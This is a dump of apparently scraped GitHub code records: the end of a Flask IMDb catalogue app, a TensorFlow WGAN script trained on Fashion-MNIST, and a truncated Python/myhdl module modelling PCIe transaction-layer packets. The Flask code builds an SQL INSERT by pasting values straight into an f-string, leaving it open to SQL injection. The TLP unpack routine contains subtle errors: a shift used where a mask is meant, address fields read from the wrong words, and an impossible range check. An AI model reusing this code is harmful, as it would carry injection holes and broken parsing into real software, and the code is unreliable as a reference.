VALUES('{IMDbID}','{title}','{link}','{releaseDate}');\"\n try:\n with create_connection() as cnxn:\n cur = cnxn.cursor()\n cur.execute(query)\n cnxn.commit()\n except Error as e:\n print(e)\n\n return view()\n\n\n\n@app.route('/search')\ndef search():\n data = [{\"id\": \"\", \"resultType\": \"\", \"image\": \"/static/noPoster.jpeg\", \"title\": \"\", \"description\": \"\"}, \n {\"id\": \"\", \"resultType\": \"\", \"image\": \"/static/noPoster.jpeg\", \"title\": \"\", \"description\": \"\"}, \n {\"id\": \"\", \"resultType\": \"\", \"image\": \"/static/noPoster.jpeg\", \"title\": \"\", \"description\": \"\"}]\n return render_template('search.html', data=data)\n\n@app.route('/sendSearch', methods=[\"GET\", \"POST\"])\ndef sendSearch():\n APIurl = f'https://imdb-api.com/en/API/Search/{IMDbKey}/'\n if request.method == 'POST':\n search = request.form.get('q')\n search = search.replace(' ', '%20')\n query = APIurl + search\n response = requests.get(query)\n response = json.loads(response.text)\n data = []\n reslen = len(response['results'])\n if reslen > 10:\n reslen = 10\n for i in range(reslen):\n data.append(response['results'][i])\n m =1\n for i in data:\n i['choice'] = f'choice{m}'\n m += 1\n return render_template('search.html', data=data)\n \n\n@app.route('/')\ndef view():\n rows = []\n query = \"SELECT * FROM Media ORDER BY Title\"\n with create_connection() as cnxn:\n cur = cnxn.cursor()\n cur.execute(query)\n row = cur.fetchone()\n\n while row:\n rows.append(row)\n row = cur.fetchone()\n return render_template('index.html', data=rows)\n \n\ndef main():\n return(app)\n","repo_name":"dharmik529/FlaskIMDb","sub_path":"flaskd/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"36486598435","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom utilities import *\nimport tensorflow as tf\nkeras = tf.keras\n\n\n# N_SAMPLES = 10240\n# N_EPOCHS = 50\nN_CRITIC = 5\n# BATCH_SIZE = 64\n# CODE_LENGTH = 256\n\n\ngenerator = generator\noptimizer_gen = keras.optimizers.Adam(learning_rate=5/10_000, beta_1=1/2, beta_2=9/10)\ntrain_loss_gen = keras.metrics.Mean(name='train_loss')\n\n\ndiscriminator = discriminator\noptimizer_dis = keras.optimizers.Adam(learning_rate=5/10_000, beta_1=1/2, beta_2=9/10)\ntrain_loss_dis = keras.metrics.Mean(name='train_loss')\n\n\ndef run_generator(z, training=False):\n z_g = tf.reshape(z, [-1, 1, 1, CODE_LENGTH])\n return generator(z_g, training=training)\n\n\ndef run_discriminator(x, training=False):\n x_d = tf.image.resize(x, [64, 64])\n return discriminator(x_d, training=training)\n\n\ndef run_model(x_i, z_n, training=False):\n x_g = run_generator(z_n, training=training)\n z_d1 = run_discriminator(x_i, training=training)\n z_d2 = run_discriminator(x_g, training=training)\n # print(z_d2.shape)\n # print(z_d1.shape)\n # print()\n loss_discriminator = tf.reduce_mean(z_d2 - z_d1)\n loss_generator = tf.reduce_mean(-z_d2)\n return loss_discriminator, loss_generator\n\n\n@tf.function\ndef learn_discriminator(x_i):\n # z_n = tf.random.uniform([BATCH_SIZE, CODE_LENGTH], -1., 1.)\n z_n = tf.random.uniform([x_i.shape[0], CODE_LENGTH], -1., 1.)\n with tf.GradientTape() as tape:\n loss_discriminator, _ = run_model(x_i, z_n, training=True)\n grad_discriminator = tape.gradient(loss_discriminator, discriminator.trainable_variables)\n optimizer_dis.apply_gradients(zip(grad_discriminator, discriminator.trainable_variables))\n for v in discriminator.trainable_variables:\n v.assign(tf.clip_by_value(v, -0.01, 0.01))\n train_loss_dis(loss_discriminator)\n\n\n@tf.function\ndef learn_generator():\n z_n = tf.random.uniform([BATCH_SIZE, CODE_LENGTH], -1., 1.)\n x_g = tf.zeros([BATCH_SIZE, width, height, 1]) # don't need discriminator values of true distribution\n with tf.GradientTape() as tape:\n _, loss_generator = run_model(x_g, z_n, training=True)\n grad_generator = tape.gradient(loss_generator, generator.trainable_variables)\n optimizer_gen.apply_gradients(zip(grad_generator, generator.trainable_variables))\n train_loss_gen(loss_generator)\n\n\n(X_train, _), (_, _) = keras.datasets.fashion_mnist.load_data()\nX_train = X_train.astype(np.float32)[0: N_SAMPLES] / 255.\nwidth = X_train.shape[1]\nheight = X_train.shape[2]\nX_train_g = tf.data.Dataset.from_tensor_slices(\n np.expand_dims(X_train, axis=3)\n).shuffle(1000).batch(BATCH_SIZE)\n# ).shuffle(1000).batch(N_CRITIC * BATCH_SIZE)\n\n\ndef train():\n for e in range(N_EPOCHS):\n for x_i in X_train_g:\n # for i in range(N_CRITIC):\n # learn_discriminator(x_i[i * BATCH_SIZE: (i+1) * BATCH_SIZE])\n learn_discriminator(x_i)\n learn_generator()\n print('Epoch %d | Discriminator Loss: %.3f | Generator Loss: %.3f'\n % (e, train_loss_dis.result(), train_loss_gen.result()))\n train_loss_dis.reset_states()\n train_loss_gen.reset_states()\n\n\ntrain()\n\n\n# SHOW SOME RESULTS\nZ = np.random.uniform(low=-1., high=1., size=[50, CODE_LENGTH]).astype(np.float32)\nY_s = run_generator(Z, training=False)\nY_s = np.squeeze((Y_s + 1.) * 1/2 * 255.).astype(np.uint8)\nsns.set()\nfig, ax = plt.subplots(nrows=5, ncols=10, figsize=[22, 8])\nfor i in range(5):\n for j in range(10):\n ax[i, j].imshow(Y_s[i + j], cmap='gray')\n ax[i, j].set_xticks([])\n ax[i, j].set_yticks([])\nplt.show()\nplt.clf()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Talon1989/ml_2023","sub_path":"gan/01_WGAN.py","file_name":"01_WGAN.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5461921830","text":"import inspect\nimport math\nimport mmap\nimport struct\nfrom myhdl import *\n\n# TLP formats\nFMT_3DW = 0x0\nFMT_4DW = 0x1\nFMT_3DW_DATA = 0x2\nFMT_4DW_DATA = 0x3\nFMT_TLP_PREFIX = 0x4\n\nTLP_MEM_READ = (FMT_3DW, 0x00)\nTLP_MEM_READ_64 = (FMT_4DW, 0x00)\nTLP_MEM_READ_LOCKED = (FMT_3DW, 0x01)\nTLP_MEM_READ_LOCKED_64 = (FMT_4DW, 0x01)\nTLP_MEM_WRITE = (FMT_3DW_DATA, 0x00)\nTLP_MEM_WRITE_64 = (FMT_4DW_DATA, 0x00)\nTLP_IO_READ = (FMT_3DW, 0x02)\nTLP_IO_WRITE = (FMT_3DW_DATA, 0x02)\nTLP_CFG_READ_0 = (FMT_3DW, 0x04)\nTLP_CFG_WRITE_0 = (FMT_3DW_DATA, 0x04)\nTLP_CFG_READ_1 = (FMT_3DW, 0x05)\nTLP_CFG_WRITE_1 = (FMT_3DW_DATA, 0x05)\nTLP_MSG_TO_RC = (FMT_4DW, 0x10)\nTLP_MSG_ADDR = (FMT_4DW, 0x11)\nTLP_MSG_ID = (FMT_4DW, 0x12)\nTLP_MSG_BCAST = (FMT_4DW, 0x13)\nTLP_MSG_LOCAL = (FMT_4DW, 0x14)\nTLP_MSG_GATHER = (FMT_4DW, 0x15)\nTLP_MSG_DATA_TO_RC = (FMT_4DW_DATA, 0x10)\nTLP_MSG_DATA_ADDR = (FMT_4DW_DATA, 0x11)\nTLP_MSG_DATA_ID = (FMT_4DW_DATA, 0x12)\nTLP_MSG_DATA_BCAST = (FMT_4DW_DATA, 0x13)\nTLP_MSG_DATA_LOCAL = (FMT_4DW_DATA, 0x14)\nTLP_MSG_DATA_GATHER = (FMT_4DW_DATA, 0x15)\nTLP_CPL = (FMT_3DW, 0x0A)\nTLP_CPL_DATA = (FMT_3DW_DATA, 0x0A)\nTLP_CPL_LOCKED = (FMT_3DW, 0x0B)\nTLP_CPL_LOCKED_DATA = (FMT_3DW_DATA, 0x0B)\nTLP_FETCH_ADD = (FMT_3DW_DATA, 0x0C)\nTLP_FETCH_ADD_64 = (FMT_4DW_DATA, 0x0C)\nTLP_SWAP = (FMT_3DW_DATA, 0x0D)\nTLP_SWAP_64 = (FMT_4DW_DATA, 0x0D)\nTLP_CAS = (FMT_3DW_DATA, 0x0E)\nTLP_CAS_64 = (FMT_4DW_DATA, 0x0E)\nTLP_PREFIX_MRIOV = (FMT_TLP_PREFIX, 0x00)\nTLP_PREFIX_VENDOR_L0 = (FMT_TLP_PREFIX, 0x0E)\nTLP_PREFIX_VENDOR_L1 = (FMT_TLP_PREFIX, 0x0F)\nTLP_PREFIX_EXT_TPH = (FMT_TLP_PREFIX, 0x10)\nTLP_PREFIX_VENDOR_E0 = (FMT_TLP_PREFIX, 0x1E)\nTLP_PREFIX_VENDOR_E1 = (FMT_TLP_PREFIX, 0x1F)\n\n# Message types\nMSG_UNLOCK = 0x00\nMSG_INVALIDATE_REQ = 0x01\nMSG_INVALIDATE_CPL = 0x02\nMSG_PAGE_REQ = 0x04\nMSG_PRG_RESP = 0x05\nMSG_LTR = 0x10\nMSG_OBFF = 0x12\nMSG_PM_AS_NAK = 0x14\nMSG_PM_PME = 0x18\nMSG_PME_TO = 0x19\nMSG_PME_TO_ACK = 0x1A\nMSG_ASSERT_INTA = 0x20\nMSG_ASSERT_INTB = 0x21\nMSG_ASSERT_INTC = 0x22\nMSG_ASSERT_INTD = 0x23\nMSG_DEASSERT_INTA = 0x24\nMSG_DEASSERT_INTB = 0x25\nMSG_DEASSERT_INTC = 0x26\nMSG_DEASSERT_INTD = 0x27\nMSG_ERR_COR = 0x30\nMSG_ERR_NONFATAL = 0x31\nMSG_ERR_FATAL = 0x32\nMSG_SET_SPL = 0x50\nMSG_VENDOR_0 = 0x7e\nMSG_VENDOR_1 = 0x7f\n\nAT_DEFAULT = 0x0\nAT_TRANSLATE_REQ = 0x1\nAT_TRANSLATED = 0x2\n\nCPL_STATUS_SC = 0x0 # successful completion\nCPL_STATUS_UR = 0x1 # unsupported request\nCPL_STATUS_CRS = 0x2 # configuration request retry status\nCPL_STATUS_CA = 0x4 # completer abort\n\n# PCIe capabilities\nMSI_CAP_ID = 0x05\nMSI_CAP_LEN = 6\nMSIX_CAP_ID = 0x11\nMSIX_CAP_LEN = 3\n\nPM_CAP_ID = 0x01\nPM_CAP_LEN = 2\n\nPCIE_CAP_ID = 0x10\nPCIE_CAP_LEN = 15\n\nSEC_PCIE_EXT_CAP_ID = 0x0019\nSEC_PCIE_EXT_CAP_LEN = 3\n\nPCIE_GEN_RATE = {\n 1: 2.5*8/10,\n 2: 5*8/10,\n 3: 8*128/130,\n 4: 16*128/130,\n 5: 32*128/130,\n}\n\n\n# debugging\ntrace_routing = False\n\n\ndef align(val, mask):\n if val & mask:\n return val + mask + 1 - (val & mask)\n else:\n return val\n\n\ndef byte_mask_update(old, mask, new, bitmask=-1):\n new = (new & bitmask) | (old & ~bitmask)\n m1 = 1\n m2 = 0xff\n while mask >= m1:\n if mask & m1:\n old = (old & ~m2) | (new & m2)\n m1 <<= 1\n m2 <<= 8\n return old\n\n\ndef highlight(s):\n return \"\\033[32m%s\\033[0m\" % s\n\n\nclass PcieId(object):\n def __init__(self, bus=0, device=0, function=0):\n self.bus = 0\n self.device = 0\n self.function = 0\n if isinstance(bus, PcieId):\n self.bus = bus.bus\n self.device = bus.device\n self.function = bus.function\n elif isinstance(bus, tuple):\n self.bus, self.device, self.function = bus\n else:\n self.bus = bus\n self.device = device\n self.function = function\n\n @classmethod\n def from_int(cls, val):\n return cls((val >> 8) & 0xff, (val >> 3) & 0x1f, val & 0x7)\n\n def __eq__(self, other):\n if isinstance(other, PcieId):\n return self.bus == other.bus and self.device == other.device and self.function == other.function\n return False\n\n def __int__(self):\n return ((self.bus & 0xff) << 8) | ((self.device & 0x1f) << 3) | (self.function & 0x7)\n\n def __str__(self):\n return \"%02x:%02x.%x\" % (self.bus, self.device, self.function)\n\n def __repr__(self):\n return \"PcieId(%d, %d, %d)\" % (self.bus, self.device, self.function)\n\n\nclass PcieCap(object):\n def __init__(self, cap_id, cap_ver=None, length=None, read=None, write=None, offset=None, next_cap=None):\n self.cap_id = cap_id\n self.cap_ver = cap_ver\n self.length = length\n self.read = read\n self.write = write\n self.offset = offset\n self.next_cap = next_cap\n\n def read_register(self, reg):\n val = self.read(reg)\n if reg == 0:\n val = (val & 0xffff0000) | ((self.next_cap & 0xff) << 8) | (self.cap_id & 0xff)\n return val\n\n def write_register(self, reg, data, mask):\n self.write(reg, data, mask)\n\n def __repr__(self):\n return \"PcieCap(cap_id={:#x}, cap_ver={}, length={}, read={}, write={}, offset={}, next_cap={})\".format(self.cap_id, repr(self.cap_ver), repr(self.length), repr(self.read), repr(self.write), repr(self.offset), repr(self.next_cap))\n\n\nclass PcieExtCap(PcieCap):\n def read_register(self, reg):\n if reg == 0:\n return ((self.next_cap & 0xfff) << 20) | ((self.cap_ver & 0xf) << 16) | (self.cap_id & 0xffff)\n return self.read(reg)\n\n\nclass PcieCapList(object):\n def __init__(self):\n self.cap_type = PcieCap\n self.list = []\n self.start = 0x10\n self.end = 0x3f\n\n def find_by_id(self, cap_id):\n for cap in self.list:\n if cap.cap_id == cap_id:\n return cap\n return None\n\n def find_by_reg(self, reg):\n for cap in self.list:\n if cap.offset <= reg < cap.offset+cap.length:\n return cap\n return None\n\n def read_register(self, reg):\n cap = self.find_by_reg(reg)\n if cap:\n return cap.read_register(reg-cap.offset)\n return 0\n\n def write_register(self, reg, data, mask):\n cap = self.find_by_reg(reg)\n if cap:\n cap.write_register(reg-cap.offset, data, mask)\n\n def register(self, cap_id, cap_ver=None, length=None, read=None, write=None, offset=None):\n if isinstance(cap_id, self.cap_type):\n new_cap = cap_id\n else:\n new_cap = self.find_by_id(cap_id)\n\n if new_cap:\n # re-registering cap\n\n # remove from list\n self.list.remove(new_cap)\n\n # update parameters\n if cap_ver is not None:\n new_cap.cap_ver = cap_ver\n if length:\n new_cap.length = length\n if read:\n new_cap.read = read\n if write:\n new_cap.write = write\n if offset:\n new_cap.offset = offset\n\n if not new_cap:\n new_cap = self.cap_type(cap_id, cap_ver, length, read, write, offset)\n\n if not new_cap.length or not new_cap.read or not new_cap.write:\n raise Exception(\"Missing required parameter\")\n\n bump_list = []\n\n if new_cap.offset:\n for cap in self.list:\n if cap.offset <= new_cap.offset+new_cap.length-1 and new_cap.offset <= cap.offset+cap.length-1:\n bump_list.append(cap)\n for cap in bump_list:\n self.list.remove(cap)\n else:\n new_cap.offset = self.start\n for cap in self.list:\n if cap.offset < new_cap.offset+new_cap.length-1 and new_cap.offset <= cap.offset+cap.length-1:\n new_cap.offset = cap.offset+cap.length\n\n self.list.append(new_cap)\n\n # sort list by offset\n self.list.sort(key=lambda x: x.offset)\n\n # update list next cap pointers\n for k in range(1, len(self.list)):\n self.list[k-1].next_cap = self.list[k].offset*4\n self.list[k].next_cap = 0\n\n # re-insert bumped caps\n for cap in bump_list:\n cap.offset = None\n self.register(cap)\n\n\nclass PcieExtCapList(PcieCapList):\n def __init__(self):\n super(PcieExtCapList, self).__init__()\n self.cap_type = PcieExtCap\n self.start = 0x40\n self.end = 0x3ff\n\n\nclass TLP(object):\n def __init__(self, tlp=None):\n self.fmt = 0\n self.type = 0\n self.tc = 0\n self.th = 0\n self.td = 0\n self.ep = 0\n self.attr = 0\n self.at = 0\n self.length = 0\n self.completer_id = PcieId(0, 0, 0)\n self.status = 0\n self.bcm = 0\n self.byte_count = 0\n self.requester_id = PcieId(0, 0, 0)\n self.dest_id = PcieId(0, 0, 0)\n self.tag = 0\n self.first_be = 0\n self.last_be = 0\n self.lower_address = 0\n self.address = 0\n self.register_number = 0\n self.data = []\n\n if isinstance(tlp, TLP):\n self.fmt = tlp.fmt\n self.type = tlp.type\n self.tc = tlp.tc\n self.td = tlp.td\n self.ep = tlp.ep\n self.attr = tlp.attr\n self.at = tlp.at\n self.length = tlp.length\n self.completer_id = tlp.completer_id\n self.status = tlp.status\n self.bcm = tlp.bcm\n self.byte_count = tlp.byte_count\n self.requester_id = tlp.requester_id\n self.dest_id = tlp.dest_id\n self.tag = tlp.tag\n self.first_be = tlp.first_be\n self.last_be = tlp.last_be\n self.lower_address = tlp.lower_address\n self.address = tlp.address\n self.register_number = tlp.register_number\n self.data = tlp.data\n\n @property\n def fmt_type(self):\n return (self.fmt, self.type)\n\n @fmt_type.setter\n def fmt_type(self, val):\n self.fmt, self.type = val\n\n @property\n def completer_id(self):\n return self._completer_id\n \n @completer_id.setter\n def completer_id(self, val):\n self._completer_id = PcieId(val)\n\n @property\n def requester_id(self):\n return self._requester_id\n \n @requester_id.setter\n def requester_id(self, val):\n self._requester_id = PcieId(val)\n\n @property\n def dest_id(self):\n return self._dest_id\n \n @dest_id.setter\n def dest_id(self, val):\n self._dest_id = PcieId(val)\n\n def check(self):\n \"\"\"Validate TLP\"\"\"\n ret = True\n if self.fmt == FMT_3DW_DATA or self.fmt == FMT_4DW_DATA:\n if self.length != len(self.data):\n print(\"TLP validation failed, length field does not match data: %s\" % repr(self))\n ret = False\n if 0 > self.length > 1024:\n print(\"TLP validation failed, length out of range: %s\" % repr(self))\n ret = False\n if (self.fmt_type == TLP_MEM_READ or self.fmt_type == TLP_MEM_READ_64 or\n self.fmt_type == TLP_MEM_READ_LOCKED or self.fmt_type == TLP_MEM_READ_LOCKED_64 or\n self.fmt_type == TLP_MEM_WRITE or self.fmt_type == TLP_MEM_WRITE_64):\n if self.length*4 > 0x1000 - (self.address & 0xfff):\n print(\"TLP validation failed, request crosses 4K boundary: %s\" % repr(self))\n ret = False\n if (self.fmt_type == TLP_IO_READ or self.fmt_type == TLP_IO_WRITE):\n if self.length != 1:\n print(\"TLP validation failed, invalid length for IO request: %s\" % repr(self))\n ret = False\n if self.last_be != 0:\n print(\"TLP validation failed, invalid last BE for IO request: %s\" % repr(self))\n ret = False\n if (self.fmt_type == TLP_CPL_DATA):\n if (self.byte_count + (self.lower_address&3) + 3) < self.length*4:\n print(\"TLP validation failed, completion byte count too small: %s\" % repr(self))\n ret = False\n return ret\n\n def set_completion(self, tlp, completer_id, has_data=False, status=CPL_STATUS_SC):\n \"\"\"Prepare completion for TLP\"\"\"\n if has_data:\n self.fmt_type = TLP_CPL_DATA\n else:\n self.fmt_type = TLP_CPL\n self.requester_id = tlp.requester_id\n self.completer_id = completer_id\n self.status = status\n self.attr = tlp.attr\n self.tag = tlp.tag\n self.tc = tlp.tc\n\n def set_completion_data(self, tlp, completer_id):\n \"\"\"Prepare completion with data for TLP\"\"\"\n self.set_completion(tlp, completer_id, True)\n\n def set_ur_completion(self, tlp, completer_id):\n \"\"\"Prepare unsupported request (UR) completion for TLP\"\"\"\n self.set_completion(tlp, completer_id, False, CPL_STATUS_UR)\n\n def set_crs_completion(self, tlp, completer_id):\n \"\"\"Prepare configuration request retry status (CRS) completion for TLP\"\"\"\n self.set_completion(tlp, completer_id, False, CPL_STATUS_CRS)\n\n def set_ca_completion(self, tlp, completer_id):\n \"\"\"Prepare completer abort (CA) completion for TLP\"\"\"\n self.set_completion(tlp, completer_id, False, CPL_STATUS_CA)\n\n def set_be(self, addr, length):\n \"\"\"Compute byte enables, DWORD address, and DWORD length from byte address and length\"\"\"\n self.address = addr & ~3\n first_pad = addr % 4\n last_pad = 3 - (addr+length-1) % 4\n self.length = math.ceil((length+first_pad+last_pad)/4)\n self.first_be = (0xf << first_pad) & 0xf\n self.last_be = (0xf >> last_pad)\n if self.length == 1:\n self.first_be &= self.last_be\n self.last_be = 0\n\n return (first_pad, last_pad)\n\n def set_data(self, data):\n \"\"\"Set DWORD data from byte data\"\"\"\n self.data = []\n for k in range(0, len(data), 4):\n self.data.append(struct.unpack('> 32) & 0xffffffff\n pkt.append(l)\n l |= self.address & 0xfffffffc\n pkt.append(l)\n elif (self.fmt_type == TLP_CPL or self.fmt_type == TLP_CPL_DATA or\n self.fmt_type == TLP_CPL_LOCKED or self.fmt_type == TLP_CPL_LOCKED_DATA):\n l = self.byte_count & 0xfff\n l |= (self.bcm & 1) << 12\n l |= (self.status & 0x7) << 13\n l |= int(self.completer_id) << 16\n pkt.append(l)\n l = self.lower_address & 0x7f\n l |= (self.tag & 0xff) << 8\n l |= int(self.requester_id) << 16\n pkt.append(l)\n else:\n raise Exception(\"Unknown TLP type\")\n\n if self.fmt == FMT_3DW_DATA or self.fmt == FMT_4DW_DATA:\n pkt.extend(self.data)\n\n return pkt\n\n def unpack(self, pkt):\n \"\"\"Unpack TLP from DWORD array\"\"\"\n self.length = pkt[0] & 0x3ff\n self.at = (pkt[0] >> 10) & 0x3\n self.attr = (pkt[0] >> 12) & 0x3\n self.ep = (pkt[0] >> 14) & 1\n self.td = (pkt[0] >> 15) & 1\n self.th = (pkt[0] >> 16) & 1\n self.attr |= (pkt[0] >> 16) & 0x4\n self.tc = (pkt[0] >> 20) & 0x7\n self.type = (pkt[0] >> 24) & 0x1f\n self.fmt = (pkt[0] >> 29) & 0x7\n\n if self.fmt == FMT_3DW_DATA or self.fmt == FMT_4DW_DATA:\n if self.length == 0:\n self.length = 1024\n\n if (self.fmt_type == TLP_CFG_READ_0 or self.fmt_type == TLP_CFG_WRITE_0 or\n self.fmt_type == TLP_CFG_READ_1 or self.fmt_type == TLP_CFG_WRITE_1 or\n self.fmt_type == TLP_MEM_READ or self.fmt_type == TLP_MEM_READ_64 or\n self.fmt_type == TLP_MEM_READ_LOCKED or self.fmt_type == TLP_MEM_READ_LOCKED_64 or\n self.fmt_type == TLP_MEM_WRITE or self.fmt_type == TLP_MEM_WRITE_64 or\n self.fmt_type == TLP_IO_READ or self.fmt_type == TLP_IO_WRITE):\n self.first_be = pkt[1] & 0xf\n self.last_be = (pkt[1] >> 4) & 0xf\n self.tag = (pkt[1] >> 8) & 0xff\n self.requester_id = PcieId.from_int(pkt[1] >> 16)\n\n if (self.fmt_type == TLP_CFG_READ_0 or self.fmt_type == TLP_CFG_WRITE_0 or\n self.fmt_type == TLP_CFG_READ_1 or self.fmt_type == TLP_CFG_WRITE_1):\n self.register_number = (pkt[2] >> 2) >> 0x3ff\n self.dest_id = PcieId.from_int(pkt[2] >> 16)\n elif self.fmt == FMT_3DW or self.fmt == FMT_3DW_DATA:\n self.address = pkt[3] & 0xfffffffc\n elif self.fmt == FMT_4DW or self.fmt == FMT_4DW_DATA:\n self.address = (pkt[4] & 0xffffffff) << 32 | pkt[4] & 0xfffffffc\n elif (self.fmt_type == TLP_CPL or self.fmt_type == TLP_CPL_DATA or\n self.fmt_type == TLP_CPL_LOCKED or self.fmt_type == TLP_CPL_LOCKED_DATA):\n self.byte_count = pkt[1] & 0xfff\n self.bcm = (pkt[1] >> 12) & 1\n self.status = (pkt[1] >> 13) & 0x7\n self.completer_id = PcieId.from_int(pkt[1] >> 16)\n self.lower_address = pkt[2] & 0x7f\n self.tag = (pkt[2] >> 8) & 0xff\n self.requester_id = PcieId.from_int(pkt[2] >> 16)\n\n if self.byte_count == 0:\n self.byte_count = 4096\n else:\n raise Exception(\"Unknown TLP type\")\n\n if self.fmt == FMT_3DW_DATA:\n self.data = pkt[3:]\n elif self.fmt == FMT_4DW_DATA:\n self.data = pkt[4:]\n\n return self\n\n def __eq__(self, other):\n if isinstance(other, TLP):\n return (\n self.data == other.data and\n self.fmt == other.fmt and\n self.type == other.type and\n self.tc == other.tc and\n self.td == other.td and\n self.ep == other.ep and\n self.attr == other.attr and\n self.at == other.at and\n self.length == other.length and\n self.completer_id == other.completer_id and\n self.status == other.status and\n self.bcm == other.bcm and\n self.byte_count == other.byte_count and\n self.requester_id == other.requester_id and\n self.dest_id == other.dest_id and\n self.tag == other.tag and\n self.first_be == other.first_be and\n self.last_be == other.last_be and\n self.lower_address == other.lower_address and\n self.address == other.address and\n self.register_number == other.register_number\n )\n return False\n\n def __repr__(self):\n return (\n ('TLP(data=[%s], ' % ', '.join(hex(x) for x in self.data)) +\n ('fmt=0x%x, ' % self.fmt) +\n ('type=0x%x, ' % self.type) +\n ('tc=0x%x, ' % self.tc) +\n ('th=0x%x, ' % self.th) +\n ('td=0x%x, ' % self.td) +\n ('ep=0x%x, ' % self.ep) +\n ('attr=0x%x, ' % self.attr) +\n ('at=0x%x, ' % self.at) +\n ('length=0x%x, ' % self.length) +\n ('completer_id=%s, ' % repr(self.completer_id)) +\n ('status=0x%x, ' % self.status) +\n ('bcm=0x%x, ' % self.bcm) +\n ('byte_count=0x%x, ' % self.byte_count) +\n ('requester_id=%s, ' % repr(self.requester_id)) +\n ('dest_id=%s, ' % repr(self.dest_id)) +\n ('tag=0x%x, ' % self.tag) +\n ('first_be=0x%x, ' % self.first_be) +\n ('last_be=0x%x, ' % self.last_be) +\n ('lower_address=0x%x, ' % self.lower_address) +\n ('address=0x%x, ' % self.address) +\n ('register_number=0x%x)' % self.register_number)\n )\n\n\nclass Port(object):\n \"\"\"Basic port\"\"\"\n def __init__(self, parent=None, rx_handler=None):\n self.parent = parent\n self.other = None\n self.rx_handler = rx_handler\n\n self.tx_queue = []\n self.tx_scheduled = False\n\n self.max_speed = 3\n self.max_width = 16\n self.port_delay = 5\n\n self.cur_speed = 1\n self.cur_width = 1\n self.link_delay = 0\n\n def connect(self, port):\n if isinstance(port, Port):\n self._connect(port)\n else:\n port.connect(self)\n\n def _connect(self, port):\n if self.other is not None:\n raise Exception(\"Already connected\")\n port._connect_int(self)\n self._connect_int(port)\n\n def _connect_int(self, port):\n if self.other is not None:\n raise Exception(\"Already connected\")\n self.other = port\n self.cur_speed = min(self.max_speed, port.max_speed)\n self.cur_width = min(self.max_width, port.max_width)\n self.link_delay = self.port_delay + port.port_delay\n\n def send(self, tlp):\n self.tx_queue.append(tlp)\n if not self.tx_scheduled:\n # schedule transmit\n yield self.transmit(), None\n self.tx_scheduled = True\n\n def transmit(self):\n if self.tx_queue:\n # schedule transmit\n tlp = self.tx_queue.pop(0)\n d = tlp.get_wire_size()*8/(PCIE_GEN_RATE[self.cur_speed]*self.cur_width)\n yield delay(int(d))\n yield self.transmit(), None\n yield delay(int(self.link_delay))\n yield self._transmit(tlp)\n else:\n self.tx_scheduled = False\n\n def _transmit(self, tlp):\n if self.other is None:\n raise Exception(\"Port not connected\")\n yield from self.other.ext_recv(tlp)\n\n def ext_recv(self, tlp):\n if self.rx_handler is None:\n raise Exception(\"Receive handler not set\")\n yield from self.rx_handler(tlp)\n\n\nclass BusPort(Port):\n \"\"\"Port for root of bus interconnection, broadcasts TLPs to all connected ports\"\"\"\n def __init__(self, parent=None, rx_handler=None):\n super(BusPort, self).__init__(parent, rx_handler)\n\n self.other = []\n\n def _connect(self, port):\n if port in self.other:\n raise Exception(\"Already connected\")\n port._connect_int(self)\n self._connect_int(port)\n\n def _connect_int(self, port):\n if port in self.other:\n raise Exception(\"Already connected\")\n self.other.append(port)\n self.cur_speed = min(self.max_speed, port.max_speed)\n self.cur_width = min(self.max_width, port.max_width)\n self.link_delay = self.port_delay + port.port_delay\n\n def _transmit(self, tlp):\n if not self.other:\n raise Exception(\"Port not connected\")\n for p in self.other:\n yield from p.ext_recv(TLP(tlp))\n\n\nclass PMCapability(object):\n \"\"\"Power Management capability\"\"\"\n def __init__(self, *args, **kwargs):\n super(PMCapability, self).__init__(*args, **kwargs)\n\n # Power management capability registers\n self.pm_capabilities = 0\n self.pm_control_status = 0\n self.pm_data = 0\n\n self.register_capability(PM_CAP_ID, PM_CAP_LEN, self.read_pm_cap_register, self.write_pm_cap_register)\n\n \"\"\"\n PCI Power Management Capability\n\n 31 0\n +---------------------------------+----------------+----------------+\n | PM Capabilities | Next Cap | PM Cap | 0 0x00\n +----------------+----------------+----------------+----------------+\n | PM Data | | PM Control/Status | 1 0x04\n +----------------+----------------+---------------------------------+\n \"\"\"\n def read_pm_cap_register(self, reg):\n if reg == 0: return self.pm_capabilities << 16\n elif reg == 1: return (self.pm_data << 24) | self.pm_control_status\n\n def write_pm_cap_register(self, reg, data, mask):\n # TODO\n pass\n\n\nclass PCIECapability(object):\n \"\"\"PCI Express capability\"\"\"\n def __init__(self, *args, **kwargs):\n super(PCIECapability, self).__init__(*args, **kwargs)\n\n # PCIe capability registers\n # PCIe capabilities\n self.pcie_capability_version = 2\n self.pcie_device_type = 0\n self.pcie_slot_implemented = False\n self.interrupt_message_number = 0\n # Device capabilities\n self.max_payload_size_supported = 0x5\n self.phantom_functions_supported = 0\n self.extended_tag_supported = True\n self.endpoint_l0s_acceptable_latency = 0x7\n self.endpoint_l1_acceptable_latency = 0x7\n self.role_based_error_reporting = True # TODO check ECN\n self.captured_slot_power_limit_value = 0\n self.captured_slot_power_limit_scale = 0\n self.function_level_reset_capability = False\n # Device control\n self.correctable_error_reporting_enable = False\n self.non_fatal_error_reporting_enable = False\n self.fatal_error_reporting_enable = False\n self.unsupported_request_reporting_enable = False\n self.enable_relaxed_ordering = True\n self.max_payload_size = 0x0\n 